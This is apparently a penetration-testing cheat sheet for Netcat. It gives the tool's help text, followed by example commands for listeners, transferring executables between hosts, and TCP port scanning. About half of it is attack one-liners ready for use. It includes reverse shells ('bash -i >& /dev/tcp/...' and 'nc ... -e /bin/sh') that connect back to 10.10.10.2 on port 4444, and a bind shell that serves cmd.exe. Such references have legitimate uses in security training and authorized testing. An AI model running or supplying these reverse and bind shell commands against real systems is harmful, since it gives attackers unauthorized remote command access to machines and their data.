Netcat, arbitrary TCP and UDP connections and listens.
be4211fe5c1a19ff393a2bcfa21dad8d0a687663263a63789552bda446d9421b
nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl]
[-m minttl] [-O length] [-P proxy_username] [-p source_port]
[-q seconds] [-s source] [-T keyword] [-V rtable] [-W recvlimit] [-w timeout]
[-X proxy_protocol] [-x proxy_address[:port]] [destination] [port]
Command Summary:
-4 Use IPv4
-6 Use IPv6
-b Allow broadcast
-C Send CRLF as line-ending
-D Enable the debug socket option
-d Detach from stdin
-F Pass socket fd
-h This help text
-I length TCP receive buffer length
-i interval Delay interval for lines sent, ports scanned
-k Keep inbound sockets open for multiple connects
-l Listen mode, for inbound connects
-M ttl Outgoing TTL / Hop Limit
-m minttl Minimum incoming TTL / Hop Limit
-N Shutdown the network socket after EOF on stdin
-n Suppress name/port resolutions
-O length TCP send buffer length
-P proxyuser Username for proxy authentication
-p port Specify local port for remote connects
-q secs quit after EOF on stdin and delay of secs
-r Randomize remote ports
-S Enable the TCP MD5 signature option
-s source Local source address
-T keyword TOS value
-t Answer TELNET negotiation
-U Use UNIX domain socket
-u UDP mode
-V rtable Specify alternate routing table
-v Verbose
-W recvlimit Terminate after receiving a number of packets
-w timeout Timeout for connects and final net reads
-X proto Proxy protocol: "4", "5" (SOCKS) or "connect"
-x addr[:port] Specify proxy address and port
-Z DCCP mode
-z Zero-I/O mode [used for scanning]
Port numbers can be individual or ranges: lo-hi [inclusive]
This listener will listen on specific IP and port. IP can be removed if any interface is needed.
nc -lvp 10.10.10.2 80
Receiver
nc -nlvp 10.10.10.2 4444 > incomming.exe
Sender
nc -nv 10.10.10.2 4444 < /Downloads/wget.exe
Receiver:
nc -nlvp 10.10.10.2 4444
Identity connecting and sending the reverse shell:
bash -i >& /dev/tcp/10.10.10.2/4444 0>&1
OR identity connecting and sending the reverse shell:
nc 10.10.10.2 4444 -e /bin/sh
Receiver:
nc -nlvp 4444 -e cmd.exe
Identity connecting to bind shell::
nc -nv <ip> 4444
Note: NetCat port scanning is based on the three-way handshake.
nc -nvv -w 1 -z 10.10.10.20 3380-3390
nc -nv -u -z -w 1 10.10.10.20 160-162